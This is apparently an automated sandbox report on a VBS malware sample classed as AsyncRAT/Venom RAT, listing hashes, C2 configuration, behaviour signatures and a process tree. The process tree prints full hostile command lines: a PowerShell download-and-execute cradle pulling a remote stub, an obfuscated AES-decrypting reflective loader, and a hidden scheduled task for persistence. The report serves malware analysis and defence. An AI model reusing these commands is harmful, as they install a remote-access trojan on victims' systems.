Analysis

  • max time kernel
    94s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-12-2024 02:36

General

  • Target

    6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d.vbs

  • Size

    66KB

  • MD5

    db10d2a27be78c780e5757b46a265e6d

  • SHA1

    36f720617c0f2eb5fd700dc06714fb069dea7eb9

  • SHA256

    6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d

  • SHA512

    58e90ac9142a2221c24bf82eb24207097c2d1121c005db1533c646ce2ed461fc1318eab619a524930094711554436ca02de05a722d12cbad0cbed7da33f307c7

  • SSDEEP

    1536:813BEKsxa+9hxSiZUq50BPW8TzigIMGX5TXx2ChW3/V79j8:/KMaYhciZtuFVVIMGJXx2P8

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Dec2024

C2

45.88.88.7:6845

Mutex

zmkdvkzgwmnzhgvxwwk

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2836
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:264
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1740
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('byPitpttrKOr9S4gS51RiwODtTqtgx9LZXuwqMXWA4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KLxX3z6JPX89+JmQWr32sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZBnGU=New-Object System.IO.MemoryStream(,$param_var); $vupQr=New-Object System.IO.MemoryStream; $leNdx=New-Object System.IO.Compression.GZipStream($ZBnGU, [IO.Compression.CompressionMode]::Decompress); $leNdx.CopyTo($vupQr); $leNdx.Dispose(); $ZBnGU.Dispose(); $vupQr.Dispose(); $vupQr.ToArray();}function execute_function($param_var,$param2_var){ $QBcFyzORlfFvkyN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg=$QBcFyzORlfFvkyN.EntryPoint; $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg.Invoke($null, $param2_var);}$lH = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $lH;$cAKjuebouz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lH).Split([Environment]::NewLine);foreach ($fH in $cAKjuebouz) { if ($fH.StartsWith('::')) { $S=$fH.Substring(2); break; }}$payloads_var=[string[]]$S.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3344
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'svchoststr14_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\inicia_str_14.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4568
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\inicia_str_14.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1164
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\inicia_str_14.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4364
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('byPitpttrKOr9S4gS51RiwODtTqtgx9LZXuwqMXWA4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KLxX3z6JPX89+JmQWr32sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZBnGU=New-Object System.IO.MemoryStream(,$param_var); $vupQr=New-Object System.IO.MemoryStream; $leNdx=New-Object System.IO.Compression.GZipStream($ZBnGU, [IO.Compression.CompressionMode]::Decompress); $leNdx.CopyTo($vupQr); $leNdx.Dispose(); $ZBnGU.Dispose(); $vupQr.Dispose(); $vupQr.ToArray();}function execute_function($param_var,$param2_var){ $QBcFyzORlfFvkyN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg=$QBcFyzORlfFvkyN.EntryPoint; $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg.Invoke($null, $param2_var);}$lH = 'C:\Users\Admin\AppData\Roaming\inicia_str_14.bat';$host.UI.RawUI.WindowTitle = $lH;$cAKjuebouz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lH).Split([Environment]::NewLine);foreach ($fH in $cAKjuebouz) { if ($fH.StartsWith('::')) { $S=$fH.Substring(2); break; }}$payloads_var=[string[]]$S.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:4416

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    a26df49623eff12a70a93f649776dab7

    SHA1

    efb53bd0df3ac34bd119adf8788127ad57e53803

    SHA256

    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

    SHA512

    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    ff2ebc63009127bf2c74f18dc727774e

    SHA1

    603a245252097e9b8d6823e08a76361ba94f7720

    SHA256

    5048a68ea6a51a2a93fba28d043dbcc8ae067225e4e1b9569a74caac617e9a42

    SHA512

    15b4baf594f91eba3ad7d390859140220da191bfc9de2eeeca5455a643ce5b19cd88b221e354d6a577df799564cc73285f2418108d2b850630196053ac53007b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gdqkxm1i.xxq.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\c.bat

    Filesize

    62KB

    MD5

    b318d9f0c62b86e1c78917fa43630e1f

    SHA1

    e57533546987c2f91db873ab2b756bd752deafda

    SHA256

    4b429c11db344779526f0cdacc411ec8835f2682d5212ad5f5b0c1d48020a028

    SHA512

    b0417872bd1234e1ac2ecf80c14396ab92f177d54edeb1cc296b2f51af0138f3bfd11f2431f879ad59abfefb9fa83ec93e4c9ce8e14abd79cd1faf1c9217a75c

  • C:\Users\Admin\AppData\Roaming\inicia_str_14.vbs

    Filesize

    113B

    MD5

    9ecc1797d1869533d6b8c20cd0c53cfc

    SHA1

    a128856bc511b103d0599ba1ee135da1681e377f

    SHA256

    aa54997a5f5d45a65bc44979d6709a516caec6a996d5a272899b7b62cfe38b83

    SHA512

    dd017eea52567812f62e1575e1bfffb7e3b2b7b0384f83eb355f84801b81038b53ed82bcd9c64b4d8fe94b69934b1c01becd8e899ddf595d45a06f1f0c5106f4

  • memory/264-16-0x00007FFC7EB33000-0x00007FFC7EB35000-memory.dmp

    Filesize

    8KB

  • memory/264-15-0x000002AE406D0000-0x000002AE40746000-memory.dmp

    Filesize

    472KB

  • memory/264-0-0x00007FFC7EB33000-0x00007FFC7EB35000-memory.dmp

    Filesize

    8KB

  • memory/264-17-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

    Filesize

    10.8MB

  • memory/264-14-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

    Filesize

    10.8MB

  • memory/264-13-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

    Filesize

    10.8MB

  • memory/264-12-0x000002AE40600000-0x000002AE40644000-memory.dmp

    Filesize

    272KB

  • memory/264-11-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

    Filesize

    10.8MB

  • memory/264-1-0x000002AE400F0000-0x000002AE40112000-memory.dmp

    Filesize

    136KB

  • memory/3344-33-0x000002562CEA0000-0x000002562CEA8000-memory.dmp

    Filesize

    32KB

  • memory/3344-34-0x000002562CEB0000-0x000002562CEC2000-memory.dmp

    Filesize

    72KB

  • memory/4416-65-0x000001CD26480000-0x000001CD26498000-memory.dmp

    Filesize

    96KB